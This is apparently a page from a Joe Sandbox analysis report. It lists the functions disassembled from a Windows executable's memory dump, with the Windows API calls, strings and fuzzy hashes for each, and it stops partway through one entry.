Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction ID: 674d6299a4ccb5e49e6784c32065778231c432ecf63c857f21cdabfa189650d4
Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction Fuzzy Hash: 03F0EC2AB3C562E2FB61FB25E895A76A3A1BFD0706FC15431E94E42854DF6CE508CB10

Function 00007FF741EB91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF741EB9211
SHAutoComplete.SHLWAPI ref: 00007FF741EB9255

Part of subcall function 00007FF741EB13C4: CompareStringW.KERNEL32 ref: 00007FF741EB13E3

FindWindowExW.USER32 ref: 00007FF741EB923F

Strings

EDIT, xrefs: 00007FF741EB921B, 00007FF741EB9233

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction ID: 1ed1dbac67dbb5eff74ba8d24eaa71349ead954d4cdf7a16bc0a8df6bfec8421
Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction Fuzzy Hash: 78016769B1C763C1FB22F721B8103F5A390BF98742FC40131CD4D46655EFACE1498660

Function 00007FF741EA2CE0 Relevance: 6.1, APIs: 4, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(00007FF741EA8C9A), ref: 00007FF741EA2D22
WriteFile.KERNEL32 ref: 00007FF741EA2D6C
WriteFile.KERNELBASE ref: 00007FF741EA2D9A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
Instruction ID: 22b230276eaada174eddd77e64f732db795eac7a643b9a876bddb6b4a396c8f5
Opcode Fuzzy Hash: 95d7fd16c8d926fcf5da752308064adee905e679e75eda990adbc5c1a1c917ca
Instruction Fuzzy Hash: 3951E526B1D663D2FB12BB25D84477AA320FF45BD2F844131EA1D06A96DFBCE485C360

Function 00007FF741EC03E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32 ref: 00007FF741EC0556
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC05C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC05C7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC05CD

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$TextWindow
String ID:
API String ID: 2912839123-0
Opcode ID: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
Instruction ID: 5f9398c73e944fc7940bb906db567af6302cdfeb0973c69b38cabdf430116e77
Opcode Fuzzy Hash: 34b731ebe9af3ba17aed105ea6cd5e0b01c3b8b12ff97f26908d03dc914b4b53
Instruction Fuzzy Hash: A651A36AF18762C5FB02BB64D8442ADA322BF45B95FC40231DA2C167D6EFBCD140C320

Function 00007FF741EA3684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF741EA309D), ref: 00007FF741EA36CE
CreateDirectoryW.KERNEL32 ref: 00007FF741EA3733
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF741EA309D), ref: 00007FF741EA3791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA37CE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
Instruction ID: 9d96cebe3993cea4acf856368323a1b0758d76f2dede4c70fd9097fb075a9cd1
Opcode Fuzzy Hash: 9d9d2995018f7f6f648ac6a5d97c5d37007cde808aee1d861722df7aa9659c46
Instruction Fuzzy Hash: 0131C32AA0C662C2EB62BB25E54427AE351BF897D2FD40231EE9D42695DFBCD4458320

Function 00007FF741EC2D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF741EC2D7B

Part of subcall function 00007FF741EC27FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF741EC281E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF741EC2D90
__scrt_release_startup_lock.LIBCMT ref: 00007FF741EC2DFE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF741EC2E51

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction ID: d51267c6ed1d93ddb8acb03b92359efcc18b8ac46d5bdacf8cd7a386dbdd0246
Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction Fuzzy Hash: C6313B2DA0C223C5EB67BB65D8113B99791BF41386FC41434E90E072D7EFACA805C674

Function 00007FF741EA2320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF741EA2927,?,00100000,?,00000001,00000000,00000000,?,00007FF741EA14C1), ref: 00007FF741EA2348
ReadFile.KERNELBASE ref: 00007FF741EA2367
GetLastError.KERNEL32 ref: 00007FF741EA239B
GetLastError.KERNEL32 ref: 00007FF741EA23BA

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction ID: 641ced07a31ee1e524c24ea92782028299c055e9eeca1573324cc5115a812eb6
Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction Fuzzy Hash: D5219229B0C563C1EB617B21A40023DE7A0FF46BD6F944530DA5D5A686CFFCD8898720

Function 00007FF741EAE948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EAECD8: ResetEvent.KERNEL32 ref: 00007FF741EAECF1
Part of subcall function 00007FF741EAECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF741EAED07

ReleaseSemaphore.KERNEL32 ref: 00007FF741EAE974
CloseHandle.KERNELBASE ref: 00007FF741EAE993
DeleteCriticalSection.KERNEL32 ref: 00007FF741EAE9AA
CloseHandle.KERNEL32 ref: 00007FF741EAE9B7

Part of subcall function 00007FF741EAEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA63
Part of subcall function 00007FF741EAEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF741EAE95F,?,?,?,00007FF741EA463A,?,?,?), ref: 00007FF741EAEA6E

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 502429940-0
Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction ID: 9710dda36b9599d2831fffaba9877d5d6a0813803a6a755ec14790e0ca5b63b5
Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction Fuzzy Hash: DC012D3AA18AA2D2E749BB21E55466DE370FB84BC1F444031DB6D03625CF79E4B58750

Function 00007FF741EAEAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF741EAEAE0
SetThreadPriority.KERNEL32 ref: 00007FF741EAEB36

Strings

CreateThread failed, xrefs: 00007FF741EAEAEE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction ID: dd8f10d8b4e99a446a9620a25a05f0546ffe2f3ceb608a3f282ae09787db7fbf
Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction Fuzzy Hash: D2118639A1CA52D1EB12FB10E841569F361FB84786FD88131DA4E02665DFBCE585C760

Function 00007FF741EB946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EADFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF741EADDDF

OleInitialize.OLE32 ref: 00007FF741EB9486
SHGetMalloc.SHELL32 ref: 00007FF741EB94D4

Strings

riched20.dll, xrefs: 00007FF741EB9475

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction ID: 2f37edd79ad19eda324370fa79bc7df6f4213a01d24020c7175998b857b1a128
Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
Instruction Fuzzy Hash: E7F03C79A1CA52D2EB02BF20E8142AEB3A0FB88755FC40135E98D42754DFBCE559CB10

Function 00007FF741EB095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EB853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF741EB856C

Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB67
Part of subcall function 00007FF741EAAAE0: LoadStringW.USER32 ref: 00007FF741EAAB80

Part of subcall function 00007FF741E91FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E91FFB

Part of subcall function 00007FF741E9129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF741E91396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC01BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EC01C1
SendDlgItemMessageW.USER32 ref: 00007FF741EC01F2

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3106221260-0
Opcode ID: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
Instruction ID: c0f55cdf2d7104facb9e856dd82bb6e213124545f1ce00a7da17418b6a3874f0
Opcode Fuzzy Hash: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
Instruction Fuzzy Hash: BB51E06AF18662D6EB11BBA1D8002FDA362BB85BC5F800235DE1D177D6EFACD500C360

Function 00007FF741EA2134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF741EA21CF
CreateFileW.KERNEL32 ref: 00007FF741EA223C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA22D8

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
Instruction ID: 0e20036a3199732e865cbd5c5c2e91c76a8058cc57baf48d7f567c540204635a
Opcode Fuzzy Hash: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
Instruction Fuzzy Hash: CA41C47AA0C792C2EB11BB15E444269A3A1FB85BB5F505334DFAD13AD6CFBCE4908710

Function 00007FF741E923F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF741E9243E
GetWindowTextW.USER32 ref: 00007FF741E92476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E92505

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
Instruction ID: 0bcf352b9088e7dbb7a633ecb3042a0164fa54db9a03e4bac0df0f67899a3f3d
Opcode Fuzzy Hash: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
Instruction Fuzzy Hash: E321B176A2CB9281EB11BB25A84017AA360FB89BD1F944231EF9D03B95DF7CE080C700

Function 00007FF741EB1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF741EB205B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF741EB2077
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF741EB2093

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
Instruction ID: 9e2ac00bab0fa9f358be02ed9bbd3d2f17a4a07a957b09827e075fe468cab1eb
Opcode Fuzzy Hash: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
Instruction Fuzzy Hash: 96319E16A0C6A7D1EB26F714E4443B9E3A0FF54B85F944131D24C066AADFFDE946C311

Function 00007FF741EA3D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,00000000,00000001,?,00007FF741EB07E1), ref: 00007FF741EA3D5E
SetFileAttributesW.KERNEL32 ref: 00007FF741EA3DB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA3E1A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
Instruction ID: eab598f333468e82c879d2faf5ba6ad4f767c223beb30ddc0bc93b9a56b32814
Opcode Fuzzy Hash: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
Instruction Fuzzy Hash: D5212836A0C792C2EB22BF25E445269A360FF88BD5F844230EA9D46695EF7CD541C650

Function 00007FF741EA31BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF741EB0822), ref: 00007FF741EA31E7
DeleteFileW.KERNEL32 ref: 00007FF741EA3237
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA32A1

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
Instruction ID: df3aeb215726a18765c9565459975e7d12271b82e87942f7b95ad973343feed8
Opcode Fuzzy Hash: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
Instruction Fuzzy Hash: 0421D636A1C792C2EF11BB25E44422EA360FB88BD5F904231EA9D42A99DF7CD141C760

Function 00007FF741EA32BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

